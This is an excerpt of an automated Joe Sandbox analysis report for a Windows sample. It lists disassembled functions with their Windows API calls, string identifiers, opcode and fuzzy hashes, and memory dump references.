                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: e651f3c25b203df46aacfd190aa2ab985b0c55f9f3733a120d4bb0cd0af9b602
                                                            • Instruction ID: a00c297c6c6ae947560fa3bfd7f22bddc72ee220f267f322fb0ab24ac40410b8
                                                            • Opcode Fuzzy Hash: e651f3c25b203df46aacfd190aa2ab985b0c55f9f3733a120d4bb0cd0af9b602
                                                            • Instruction Fuzzy Hash: 69615D75A00215EFCB16DF94C892FAEB7B8EB08310F15806EF956EB291D770AE44CB50
                                                            Function 00372957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00372968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00372981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                            • Instruction ID: 1d6bd6415ed87fbd3e4f474e0c90000a95211274b922992a7c70f5d03d3fc920
                                                            • Opcode Fuzzy Hash: 12325cd6b2c60818e23b6e23a493d7602eba0a331acff127af347602f43001f7
                                                            • Instruction Fuzzy Hash: B05155B24087449BD321EF20D886BABBBECFF89344F41895DF2D8450A5DF318528CB66
                                                            Function 003C9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364F0B: __fread_nolock.LIBCMT ref: 00364F29
                                                            • _wcscmp.LIBCMT ref: 003C9824
                                                            • _wcscmp.LIBCMT ref: 003C9837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                            • Instruction ID: 59a6b92258ae428b4c784bb7334ded044bfd754d193912f40322a78becad1da2
                                                            • Opcode Fuzzy Hash: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                            • Instruction Fuzzy Hash: 3841DB71A00309BADF229BA5CC49FEFB7BDDF85710F01446AF904EB185D6719E048B65
                                                            Function 003A0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: DdB$DdB
                                                            • API String ID: 1473721057-1576950555
                                                            • Opcode ID: 34b7330744f9174eecde8723ab03eba193cd751d2c7cb2a4939bb8d86ed47def
                                                            • Instruction ID: a6ed08982816c587d95862d6a9aae34e970d59d9420a0b56d7361569a88c7fd8
                                                            • Opcode Fuzzy Hash: 34b7330744f9174eecde8723ab03eba193cd751d2c7cb2a4939bb8d86ed47def
                                                            • Instruction Fuzzy Hash: 855121786087418FD766DF18C480A1ABBF1FB99344F96885DE8859B324D332EC81CF96
                                                            Function 003D258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003D259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003D25D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                            • Instruction ID: b1748c5b32ac76d98da0baee56c20ff033ef56caa4f8a864591abf7a9b9cb9a5
                                                            • Opcode Fuzzy Hash: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                            • Instruction Fuzzy Hash: D6311A71800219ABCF02EFA1DC85EEEBFB8FF18314F10405AF955AA265DB319955DB60
                                                            Function 003E7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 003E7B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                            • Instruction ID: 3f1531183d23ce4646805f9d8b0c41561ff64eb5b8e59e12b986c930f54972d3
                                                            • Opcode Fuzzy Hash: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                            • Instruction Fuzzy Hash: 83411B74A0525A9FDB15CF65D881BEABBB9FF08300F11427AE904EB391E770A951CF90
                                                            Function 003E6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 003E6B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E6B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                            • Instruction ID: 01479ae36c9f9fcf19e3f9e3e4a25e80024d40c7046e78f7039f076d22b173a4
                                                            • Opcode Fuzzy Hash: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                            • Instruction Fuzzy Hash: B731CF71200254AEDB129F26CC81BFB73ADFF987A0F108629F9A5D7190DB70AC81C760
                                                            Function 003C28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: bf2b6706b87843864f6b28b6f37f7bace1f9160ab0e67661288a52c23f7e8e50
                                                            • Instruction ID: 46539e966b7e1c037ac61daeb3da4c902b627d2da75ef221561618e818a33c9e
                                                            • Opcode Fuzzy Hash: bf2b6706b87843864f6b28b6f37f7bace1f9160ab0e67661288a52c23f7e8e50
                                                            • Instruction Fuzzy Hash: CA31BD31A00305EBEB2ADF58C885FAFBBB8EF45350F16002DE985EA1A0D7B09D54CB51
                                                            Function 003E66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E6761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                            • Instruction ID: 3d494aa78a2674d19ffdd01a0637290a09798585e67521f29ab1a338f6427b7a
                                                            • Opcode Fuzzy Hash: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                            • Instruction Fuzzy Hash: C711B6713002586FEF228F55CC81EFB376AEB543A8F114225F9149B2D0D671DC5187A0
                                                            Function 003E6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 003E6C71
                                                            • GetSysColor.USER32(00000012), ref: 003E6C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                            • Instruction ID: 2d249cebef2edb121c710c6bec0d1649db31afefdb3d89928a6e4654918e78b9
                                                            • Opcode Fuzzy Hash: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                            • Instruction Fuzzy Hash: 7E218972610259AFDF05DFA9CC46AFA7BB8FB08304F104628F995D2280E730E850DB60
                                                            Function 003E6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 003E69A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E69B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                            • Instruction ID: 884fa5feeca3d85b95f0d4340e9ca3925afa5571bff329821de2bc8604323d77
                                                            • Opcode Fuzzy Hash: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                            • Instruction Fuzzy Hash: C4119D711001A8AFEB128E659C82AEB3669EB663B4F514724F9A0961E1C771DC509760
                                                            Function 003C29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C2A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                            • Instruction ID: ea24e4fb2844b129b8fd696d0a2a66eb74d6ee09d0b44da3a2046affcaa0de06
                                                            • Opcode Fuzzy Hash: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                            • Instruction Fuzzy Hash: 9411083AA01518AFCF32EB98DC44FAB77BCAB45300F064039E855E7290DB70AD0AC795
                                                            Function 003D21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D2255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                            • Instruction ID: 4e8edb08eac8f48308ed58d8fc80a5c3e822c14eeeac6c55d6957a850b0d9896
                                                            • Opcode Fuzzy Hash: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                            • Instruction Fuzzy Hash: D2110272501265BEDB268F11AC84EFBFBACFF26351F10862BF90446640D2705990D6F0
                                                            Function 0037092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • _wcscat.LIBCMT ref: 003A4CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: SB
                                                            • API String ID: 257928180-3983915703
                                                            • Opcode ID: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                            • Instruction ID: 7315992da958bb8e8b16e9d4d4ab1a3c23a9ff7fea0552b4385f18796465ee5e
                                                            • Opcode Fuzzy Hash: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                            • Instruction Fuzzy Hash: 4B11E531A052189ACB12FB74C802EDE73F8EF09350B40C5A6BA48DB195EBB496844B14
                                                            Function 003B8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003B8E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                            • Instruction ID: 2d31360ddf744b3652359c522eb3927acec43800e94aa0da7ec39f1eae7cd56a
                                                            • Opcode Fuzzy Hash: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                            • Instruction Fuzzy Hash: 24012471605228ABCB16FBA4CC819FE736CEF01320B104A19F9715B6E1DF319808C660
                                                            Function 003C8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                            • Instruction ID: 61caae64fed9a80aa9d7746dabc1d65c8d17ec58b317635cd1ea23610cd3bb36
                                                            • Opcode Fuzzy Hash: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                            • Instruction Fuzzy Hash: DF01D6718046186EDB19DBA8C816EEABBF89B11301F00459EF553D6181E974AA088760
                                                            Function 003B8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 003B8D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                            • Instruction ID: 653a26673d7c33c44e57d93521ded935adaa0aa98d9e35969caf601c69d6833d
                                                            • Opcode Fuzzy Hash: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                            • Instruction Fuzzy Hash: 5501F271B41508ABCB17EBA0C992EFE73ACDF15300F10002EB9026B6E1DE249E08D671
                                                            Function 003B8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 003B8DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
